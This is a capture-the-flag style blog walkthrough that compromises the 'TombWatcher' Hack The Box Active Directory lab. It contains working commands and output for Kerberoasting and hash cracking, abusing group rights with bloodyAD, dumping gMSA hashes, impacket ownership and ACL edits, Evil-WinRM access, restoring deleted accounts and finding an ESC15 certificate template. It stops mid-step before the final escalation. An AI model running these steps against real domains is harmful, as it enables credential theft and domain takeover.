TombWatcher HTB Walkthrough

Welcome to another Hack the Box walkthrough. In this blog post, I have documented how to pwn the TombWatcher machine on Hack the Box. If you are new to this channel, please don’t forget to like, comment, and subscribe to my YouTube channel for more awesome content.

Also, don’t forget to follow me on LinkedIn and X for more HTB walkthrough and cybersecurity related contents.

 

About the Machine

TombWatcher is a medium-difficulty Windows Active Directory machine that challenges players to exploit misconfigurations in Active Directory Certificate Services (AD CS). The initial foothold is gained through enumeration of vulnerable certificate templates, specifically one that allows low-privileged users to enroll certificates with the Certificate Request Agent application policy. This enables an ESC1-style attack, where a user (cert_admin) can request a certificate on behalf of a high-privileged account like Administrator, ultimately leading to domain compromise. Additionally, players must explore deleted AD objects, leveraging PowerShell to enumerate tombstoned users via Get-ADObject, restore accounts with Restore-ADObject, and regain access by resetting passwords using Set-ADAccountPassword. TombWatcher combines certificate abuse, account recovery, and AD enumeration to simulate realistic attack paths often encountered in enterprise environments.

The first step in solving this machine is to connect my Kali Linux terminal with Hack the Box server. To set up this connection, I ran the following command in my terminal:

sudo openvpn tombwatcher.ovpn

After the connection has been set up, I started the target machine, and I was assigned an IP address of 10.10.11.72. Then I performed reconnaissance using Nmap to find all the open port and services associated with the target machine. Using the following command, I found all the services and port running at 10.10.11.72:

nmap -sCV -A 10.10.11.72

Output: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-25 13:38 EDT Nmap scan report for 10.10.11.72 Host is up (0.044s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-25 21:38:50Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.tombwatcher.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb | Not valid before: 2024-11-16T00:47:59 |_Not valid after: 2025-11-16T00:47:59 |_ssl-date: 2025-06-25T21:40:16+00:00; +4h00m00s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-25T21:40:15+00:00; +3h59m59s from scanner time. | ssl-cert: Subject: commonName=DC01.tombwatcher.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb | Not valid before: 2024-11-16T00:47:59 |_Not valid after: 2025-11-16T00:47:59 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-25T21:40:16+00:00; +4h00m00s from scanner time. | ssl-cert: Subject: commonName=DC01.tombwatcher.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb | Not valid before: 2024-11-16T00:47:59 |_Not valid after: 2025-11-16T00:47:59 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-25T21:40:15+00:00; +3h59m59s from scanner time. | ssl-cert: Subject: commonName=DC01.tombwatcher.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb | Not valid before: 2024-11-16T00:47:59 |_Not valid after: 2025-11-16T00:47:59 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-06-25T21:39:35 |_ start_date: N/A |_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 41.91 ms 10.10.14.1 2 41.98 ms 10.10.11.72 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.70 seconds

After the nmap scan was completed, it displayed all the open ports associated with the target machine.

I noticed an error “Clock skew too great” in the nmap scan. This error is caused due to the time difference between the target machine (10.10.11.72) and our machine. To rectified this, I ran the following command in my terminal:

timedatectl set-ntp off

This command disables automatic time synchronization via NTP (Network Time Protocol) on Linux systems that use systemd. When you turn this off, your system clock will no longer update automatically using internet time servers. You'll need to manually set the time using timedatectl set-time or another method if needed.

sudo ntpdate 10.10.11.72

This command will manually synchronizes your system clock with the time server at IP address 10.10.11.72.

ntpdate queries the specified NTP server (10.10.11.72) for the current time. If successful, it sets your system time to match that server. sudo is required because changing system time needs root privileges.

Then, I saw that the "Clock: time stepped by 14399.848111". Since many Kerberos-based operations depend on accurate time synchronization, I synced my machine’s clock with the Domain Controller using "sudo ntpdate 10.10.11.72". This adjusted my system time by four hours to match the DC's clock, resolving any potential time skew issues that could prevent Kerberos authentication or ticket validation during certificate-based exploitation.

This command opens the nano text editor and I added 10.10.11.72 which I then mapped to tombwatcher.htb DC01.tombwatcher.htb. It is important to map hostnames to IP addresses on your local machine (via /etc/hosts) for several reasons, especially in development, troubleshooting, and networking scenarios. Here's why it matters:

1. Local Name Resolution Without DNS: The /etc/hosts file allows your system to resolve hostnames without querying a DNS server. It is useful when DNS is unavailable or misconfigured and when you're in an isolated or internal network.
2. Testing and Development: You can point a domain (like myapp.local) to a local or test server (e.g., 127.0.0.1 or a staging IP). For example: 127.0.0.1  myapp.local This allows testing websites or apps locally using human-readable names.
3. Security and Control: It can prevent connections to known malicious domains by redirecting them: 127.0.0.1  malicious-site.com

You control name resolution without relying on external DNS, reducing attack vectors.

Previously in the Nmap scan, I found port 80/tcp which has the http server associated with it. It clearly is a website, and I tried to find out what is at this port by typing 10.10.11.72 in my browser. This redirected me to the Internet Information Service page on the official Microsoft Window Server webpage. I inspected the html code and tried to check the robots.txt path but I found nothing.

I noticed on the TombWatcher machine page that there were two credentials that are likely to be a username and password (henry / H3nry_987TGV!) I tried evil-winrm with the credentials in the machine information (As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!) and tried subdomain blasting but I didn’t find or get anything useful.

After trying few other methods, then I remembered that the TombWatcher is a Windows machine and I immediately thought of using bloodhound. Bloodhound is primarily used in Active Directory (AD) environments to analyze and visualize relationships and permissions for identifying privilege escalation paths and attack vectors. It is widely used by red teamers and penetration testers to gain a foothold inside a Windows network (e.g., via phishing or exploitation). It is also used to escalate privileges, move laterally, or eventually gain Domain Admin rights. To use bloodhound, I ran the following command in my terminal:

bloodhound-python -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' -gc dc01.tombwatcher.htb -c all -ns 10.10.11.72

This was the output I got:

Output: INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: tombwatcher.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.tombwatcher.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.tombwatcher.htb INFO: Found 9 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.tombwatcher.htb INFO: Done in 00M 10S

After downloading the Kerberoast Python file, I moved into the directory I am currently working in (in my case, I moved the file to Desktop > TombWatcherHTB) afterwards I ran the following command in my terminal:

python3 targetedKerberoast.py -u henry -p 'H3nry_987TGV!' –dc-ip 10.10.11.72 -d tombwatcher.htb

Output: [*] Starting kerberoast attacks [*] Fetching usernames from Active Directory with LDAP [+] Printing hash for (Alfred) $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$a91fc19090e0144170a65c2cc33be79c$97fc1bd7bbcee1bbdc5faa5c624f2a9bfa1dc93d37398b1fbddd31c999c2957e74858bc6c61dd0c0d1cd0d12402efb877297d0c522281507c2a1c4070e2d97b8b6019c6f68ef9e6b712c52bcab61e49e4ae6850fa54dcce4f0f8a82b357fbdb4716568ec6bbee8467743fd9d28e1340bad600295f2ffe0a76b1506ddcba617ce6744cee64dad66d4b1eb1128bf10438102d11510f1f1fe83081c20712a164d5e9933889b44b2e89b5a90bce2b1497f4f10c9e1ccae3c08ea4bf376ba94a53dd95712ebc6a531b7a4a8a02c2ce7f97ab5dd6c6b8d1539b59bc84c25dec1e3b1fb3f8486ab704c642edd4d28c9445af8a4e9982bb66150e15f86dce9a8b2e99d357a55503198144a84e85faa731614d366bd40a888b591105d3df2cef496b5690419cbbbb8c5086b88ea9855f1df2334317cafcd5ef387427d3e051bdd33bf0aed5193903d0c038068f1426a6a8f28ca8fc79300c9539b45cf6913f27705526631ec8526fdbadd74a71d53b5fb026a211dc506e6ec9ca130d460c7ae1d7c3920a07767ee666ccc2e29de3a6042a0889528dbddaea51ce68145fa8ccb3d5270c747634aee60fc03e0815b0a03817195c9a0f15bd0fe366ce43179c153393386985e6ffb3f182adacf20c18ea01bdfc3f3c2d435975d33e63590bfbf7efacd962369b1d5aaf8a1ef181871d408408a9ef2b6c1b13a41e76838ad3e86ae2d9f20254d6b2dcb1f2198113a29ebf342add32ebdad6713c402ea59a5c1398d72b169bb410f96a45694eae63951f44417d538a4c99f17f42a09cdcb5d221a988b1934263439d353f8f0f62e9a621379a846381a5ba5a04b2255261e3c9008fe3c39ea36ec732d8d450b8c6834a2985d4e2c3380055f97fab04ad9cd2016e4e48ea6f0d416218d610b2e4750889aa29453291ca5605a1d7262068c706ebdc81e257bc98af2ca492a19dcc46948276c45e85cbcef8145ecbf03979ce7466bf4fe0182e082777020e14a0bce3fe2eb5420a4300d320f29e9a048203159fca09834bd8062ea57517f79a80996bd134467879b82c6d2b15b64e0896a8b4ef32f1cc0b1fdd17e7c2f2cfe758491aaba758dcd54b690ca370022ad0297cdc5d439280adcd3135b26e5d74e28b0032d55af7ef0c81b231e5cbcb412529adf9c008934f291de27dde38e81ac0e083262d98d7b4326c1bcf5dec9f764d6df0a431e8dd1d774b25e24674763e8b82583ca43dac60f89ee84ae32836c412154f25cd5cc05dc8d2dee6f5c9b4e31e9cac4c2dc30c050191a265cd4abea388ae0f4deac96c7a711df080966d4c67cd3a138521fd4fc85de10cbce362ad7a9b5b76dd147ee53bf56c6333531a91b76b47fca16d664b95034689b2ea716e5af428141fb1dea09d655a0e944970f1d09b52b0d4362ce443330587d8f2fda10086bcba48303c48c0f12dd3d87b3aa4d456cdcde516f58ed531ff460137a9ac904f8de

This started the kerberoast attack by fetching usernames from active directory with LDAP. I got a hash for Alfred and attempted cracking it with john the ripper/hashcat.

I copied the hash and created a file called hash.txt and pasted the hash.

nano hash.txt

Output: hashcat (v6.2.6) starting in autodetect mode OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900HX, 1424/2912 MB (512 MB allocatable), 8MCU Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash: 13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed! Do NOT report auto-detect issues unless you are certain of the hash type. Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384 $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$a91fc19090e0144170a65c2cc33be79c$97fc1bd7bbcee1bbdc5faa5c624f2a9bfa1dc93d37398b1fbddd31c999c2957e74858bc6c61dd0c0d1cd0d12402efb877297d0c522281507c2a1c4070e2d97b8b6019c6f68ef9e6b712c52bcab61e49e4ae6850fa54dcce4f0f8a82b357fbdb4716568ec6bbee8467743fd9d28e1340bad600295f2ffe0a76b1506ddcba617ce6744cee64dad66d4b1eb1128bf10438102d11510f1f1fe83081c20712a164d5e9933889b44b2e89b5a90bce2b1497f4f10c9e1ccae3c08ea4bf376ba94a53dd95712ebc6a531b7a4a8a02c2ce7f97ab5dd6c6b8d1539b59bc84c25dec1e3b1fb3f8486ab704c642edd4d28c9445af8a4e9982bb66150e15f86dce9a8b2e99d357a55503198144a84e85faa731614d366bd40a888b591105d3df2cef496b5690419cbbbb8c5086b88ea9855f1df2334317cafcd5ef387427d3e051bdd33bf0aed5193903d0c038068f1426a6a8f28ca8fc79300c9539b45cf6913f27705526631ec8526fdbadd74a71d53b5fb026a211dc506e6ec9ca130d460c7ae1d7c3920a07767ee666ccc2e29de3a6042a0889528dbddaea51ce68145fa8ccb3d5270c747634aee60fc03e0815b0a03817195c9a0f15bd0fe366ce43179c153393386985e6ffb3f182adacf20c18ea01bdfc3f3c2d435975d33e63590bfbf7efacd962369b1d5aaf8a1ef181871d408408a9ef2b6c1b13a41e76838ad3e86ae2d9f20254d6b2dcb1f2198113a29ebf342add32ebdad6713c402ea59a5c1398d72b169bb410f96a45694eae63951f44417d538a4c99f17f42a09cdcb5d221a988b1934263439d353f8f0f62e9a621379a846381a5ba5a04b2255261e3c9008fe3c39ea36ec732d8d450b8c6834a2985d4e2c3380055f97fab04ad9cd2016e4e48ea6f0d416218d610b2e4750889aa29453291ca5605a1d7262068c706ebdc81e257bc98af2ca492a19dcc46948276c45e85cbcef8145ecbf03979ce7466bf4fe0182e082777020e14a0bce3fe2eb5420a4300d320f29e9a048203159fca09834bd8062ea57517f79a80996bd134467879b82c6d2b15b64e0896a8b4ef32f1cc0b1fdd17e7c2f2cfe758491aaba758dcd54b690ca370022ad0297cdc5d439280adcd3135b26e5d74e28b0032d55af7ef0c81b231e5cbcb412529adf9c008934f291de27dde38e81ac0e083262d98d7b4326c1bcf5dec9f764d6df0a431e8dd1d774b25e24674763e8b82583ca43dac60f89ee84ae32836c412154f25cd5cc05dc8d2dee6f5c9b4e31e9cac4c2dc30c050191a265cd4abea388ae0f4deac96c7a711df080966d4c67cd3a138521fd4fc85de10cbce362ad7a9b5b76dd147ee53bf56c6333531a91b76b47fca16d664b95034689b2ea716e5af428141fb1dea09d655a0e944970f1d09b52b0d4362ce443330587d8f2fda10086bcba48303c48c0f12dd3d87b3aa4d456cdcde516f58ed531ff460137a9ac904f8de:basketball Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb...04f8de Time.Started.....: Sat Jun 28 19:27:41 2025 (1 sec) Time.Estimated...: Sat Jun 28 19:27:42 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 395.9 kH/s (0.49ms) @ Accel:256 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 2048/14344384 (0.01%) Rejected.........: 0/2048 (0.00%) Restore.Point....: 0/14344384 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: 123456 -> lovers1 Hardware.Mon.#1..: Util: 18% Started: Sat Jun 26 19:27:37 2025 Stopped: Sat Jun 26 19:27:43 2025

I got basketball after cracking the hash.

After cracking the hash and obtaining the plaintext basketball, I used bloodyAD to check if the account had the ability to modify AD objects. I discovered that I could add users to the INFRASTRUCTURE group:

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"

The operation succeeded, and alfred was now a member of INFRASTRUCTURE. I suspected this group had elevated permissions in the domain, so I proceeded to investigate how that could be leveraged for privilege escalation or lateral movement.

After adding alfred to the Infrastructure group, I used gMSADumper.py to check for group-managed service accounts (gMSAs) with readable credentials:

python3 gMSADumper.py -u alfred -p basketball -d tombwatcher.htb

The script revealed that ansible_dev$ was a gMSA account whose password could be read by members of the Infrastructure group. Since I was already part of this group, I was able to retrieve the AES keys and NT hash for the account. These credentials could now be used to authenticate as ansible_dev$ - potentially granting me further access to the domain.

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "ANSIBLE_DEV$" -p :4b21348ca4a9edff9689cdf75cbda439 set password "sam" "Test1234."

impacket-owneredit -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

impacket-dacledit -action 'remove' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

After identifying valid credentials for the john account (Test1234.), I used Evil-WinRM to establish an interactive shell on the target:

evil-winrm -i 10.10.11.72 -u john -p 'Test1234.' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\john\Documents> type ../desktop/user.txt 2366b*************************** *Evil-WinRM* PS C:\Users\john\Documents>

This gave me PowerShell access as the john user, which I then used to enumerate Active Directory, search for misconfigurations, and perform privilege escalation techniques. After successfully connecting to the target using Evil-WinRM as john, I navigated to the user’s desktop and retrieved the user flag: type ../desktop/user.txt.

Hurray!!! I got the User Flag. This confirmed I had user-level access on the machine. With this initial foothold, I proceeded to enumerate local privileges and look for misconfigurations that could be leveraged for privilege escalation.

Now, it's time to get the root flag.

To investigate the domain history and potential tampering, I queried deleted objects in Active Directory using:

Get-ADObject -Filter 'IsDeleted -eq $true' -IncludeDeletedObjects -Properties * CanonicalName : tombwatcher.htb/Deleted Objects CN : Deleted Objects Created : 11/15/2024 7:01:41 PM createTimeStamp : 11/15/2024 7:01:41 PM Deleted : True Description : Default container for deleted objects DisplayName : DistinguishedName : CN=Deleted Objects,DC=tombwatcher,DC=htb dSCorePropagationData : {12/31/1600 7:00:00 PM} instanceType : 4 isCriticalSystemObject : True isDeleted : True LastKnownParent : Modified : 11/15/2024 7:56:00 PM modifyTimeStamp : 11/15/2024 7:56:00 PM Name : Deleted Objects ObjectCategory : CN=Container,CN=Schema,CN=Configuration,DC=tombwatcher,DC=htb ObjectClass : container ObjectGUID : 34509cb3-2b23-417b-8b98-13f0bd953319 ProtectedFromAccidentalDeletion : sDRightsEffective : 0 showInAdvancedViewOnly : True systemFlags : -1946157056 uSNChanged : 12851 uSNCreated : 5659 whenChanged : 11/15/2024 7:56:00 PM whenCreated : 11/15/2024 7:01:41 PM accountExpires : 9223372036854775807 badPasswordTime : 133957074324292907 badPwdCount : 0 CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3 CN : cert_admin DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3 codePage : 0 countryCode : 0 Created : 11/15/2024 7:55:59 PM createTimeStamp : 11/15/2024 7:55:59 PM Deleted : True Description : DisplayName : DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb dSCorePropagationData : {6/29/2025 5:50:14 PM, 6/29/2025 5:48:04 PM, 6/29/2025 5:39:30 PM, 11/15/2024 7:56:05 PM...} givenName : cert_admin instanceType : 4 isDeleted : True LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb lastLogoff : 0 lastLogon : 133957074947262134 lastLogonTimestamp : 133957069291168089 logonCount : 0 Modified : 6/29/2025 5:52:01 PM modifyTimeStamp : 6/29/2025 5:52:01 PM msDS-LastKnownRDN : cert_admin Name : cert_admin DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3 nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3 objectSid : S-1-5-21-1392491010-1358638721-2126982587-1109 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 133957074782887116 sAMAccountName : cert_admin sDRightsEffective : 7 sn : cert_admin userAccountControl : 66048 uSNChanged : 91246 uSNCreated : 12844 whenChanged : 6/29/2025 5:52:01 PM whenCreated : 11/15/2024 7:55:59 PM accountExpires : 9223372036854775807 badPasswordTime : 0 badPwdCount : 0 CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358 CN : cert_admin DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358 codePage : 0 countryCode : 0 Created : 11/16/2024 12:04:05 PM createTimeStamp : 11/16/2024 12:04:05 PM Deleted : True Description : DisplayName : DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb dSCorePropagationData : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM} givenName : cert_admin instanceType : 4 isDeleted : True LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb lastLogoff : 0 lastLogon : 0 logonCount : 0 Modified : 11/16/2024 12:04:21 PM modifyTimeStamp : 11/16/2024 12:04:21 PM msDS-LastKnownRDN : cert_admin Name : cert_admin DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358 nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358 objectSid : S-1-5-21-1392491010-1358638721-2126982587-1110 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 133762502455822446 sAMAccountName : cert_admin sDRightsEffective : 7 sn : cert_admin userAccountControl : 66048 uSNChanged : 13171 uSNCreated : 13161 whenChanged : 11/16/2024 12:04:21 PM whenCreated : 11/16/2024 12:04:05 PM accountExpires : 9223372036854775807 badPasswordTime : 0 badPwdCount : 0 CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf CN : cert_admin DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf codePage : 0 countryCode : 0 Created : 11/16/2024 12:07:04 PM createTimeStamp : 11/16/2024 12:07:04 PM Deleted : True Description : DisplayName : DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb dSCorePropagationData : {6/29/2025 5:30:16 PM, 11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM} givenName : cert_admin instanceType : 4 isDeleted : True LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb lastLogoff : 0 lastLogon : 0 lastLogonTimestamp : 133957062638824231 logonCount : 0 Modified : 6/29/2025 5:37:01 PM modifyTimeStamp : 6/29/2025 5:37:01 PM msDS-LastKnownRDN : cert_admin Name : cert_admin DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 133957062449136520 sAMAccountName : cert_admin sDRightsEffective : 7 sn : cert_admin userAccountControl : 66048 uSNChanged : 91191 uSNCreated : 13186 whenChanged : 6/29/2025 5:37:01 PM whenCreated : 11/16/2024 12:07:04 PM

This revealed multiple deleted instances of a user account named cert_admin, all residing in the Deleted Objects container. Each deletion instance had a unique objectSid, indicating the user was deleted and recreated multiple times, possibly as part of a privilege escalation or account abuse chain.

These results helped confirm that cert_admin was central to the compromise, and the LastKnownParent (OU=ADCS) suggested it was related to certificate services exploitation.

After discovering several deleted instances of the cert_admin account using Get-ADObject, I restored the most recent one using:

Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"

This brought the account back to its original location under OU=ADCS. Since AD preserves key attributes like objectSid, sAMAccountName, and group memberships during deletion (within tombstone lifetime), I was able to reuse this account to escalate privileges via ADCS certificate template abuse.

After restoring the deleted cert_admin user using Restore-ADObject, I reset its password to a known value using:

Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Test1234." -AsPlainText -Force)

Using certipy-ad find -vulnerable, I enumerated vulnerable certificate templates and found that WebServer was both enrollable by my user (cert_admin) and vulnerable to ESC15:

• It allows EnrolleeSuppliesSubject
• It uses Schema Version 1

This means I could request a certificate impersonating any domain user, including Administrator, and use it to obtain a Kerberos TGT and gain full domain access.

certipy-ad find -vulnerable -u cert_admin@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 13 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP [*] Successfully retrieved CA configuration for 'tombwatcher-CA-1' [*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Enumeration output: Certificate Authorities 0 CA Name : tombwatcher-CA-1 DNS Name : DC01.tombwatcher.htb Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC Certificate Validity Start : 2024-11-16 00:47:48+00:00 Certificate Validity End : 2123-11-16 00:57:48+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Permissions Owner : TOMBWATCHER.HTB\Administrators Access Rights ManageCa : TOMBWATCHER.HTB\Administrators TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins ManageCertificates : TOMBWATCHER.HTB\Administrators TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins Enroll : TOMBWATCHER.HTB\Authenticated Users Certificate Templates 0 Template Name : WebServer Display Name : Web Server Certificate Authorities : tombwatcher-CA-1 Enabled : True Client Authentication : False Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Extended Key Usage : Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 1 Validity Period : 2 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2024-11-16T00:57:49+00:00 Template Last Modified : 2024-11-16T17:07:26+00:00 Permissions Enrollment Permissions Enrollment Rights : TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins TOMBWATCHER.HTB\cert_admin Object Control Permissions Owner : TOMBWATCHER.HTB\Enterprise Admins Full Control Principals : TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins Write Owner Principals : TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins Write Property Enroll : TOMBWATCHER.HTB\Domain Admins TOMBWATCHER.HTB\Enterprise Admins TOMBWATCHER.HTB\cert_admin [+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin [!] Vulnerabilities ESC15 : Enrollee supplies subject and schema version is 1. [*] Remarks ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

To understand more about the ESC15 vulnerability, click here.

After gaining access as cert_admin, I leveraged a misconfigured certificate template (WebServer) that allowed low-privileged users to enroll certificates with the Certificate Request Agent OID. This made it possible for cert_admin to later request certificates on behalf of other users, including Administrator.

I issued a certificate to cert_admin with CRA permissions:

